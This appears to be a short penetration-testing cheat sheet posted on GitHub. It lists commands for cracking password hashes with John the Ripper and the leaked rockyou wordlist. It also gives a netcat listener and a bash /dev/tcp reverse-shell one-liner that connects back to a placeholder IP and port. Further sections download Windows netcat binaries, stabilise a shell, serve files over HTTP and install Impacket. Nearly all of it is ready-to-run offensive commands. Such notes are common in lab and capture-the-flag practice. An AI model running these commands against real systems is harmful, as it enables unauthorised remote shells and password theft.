You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
apt install john
git clone https://github.com/danielmiessler/SecLists.git
tar -zvf ./SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
john -w=/usr/share/wordlists/rockyou.txt hash.txt
Reverse shell
apt install ncat
# listen
nc -nvlp {$port}
# connect
bash -i >& /dev/tcp/{$ip}/{$port} 0>&1
# win
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
# bash on revency shell fix su: must be run from a terminal
/usr/bin/script -qc /bin/bash /dev/null
HTTP SERVER
python3 -m http.server {$port}
Impacket
apt install python3-pip
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt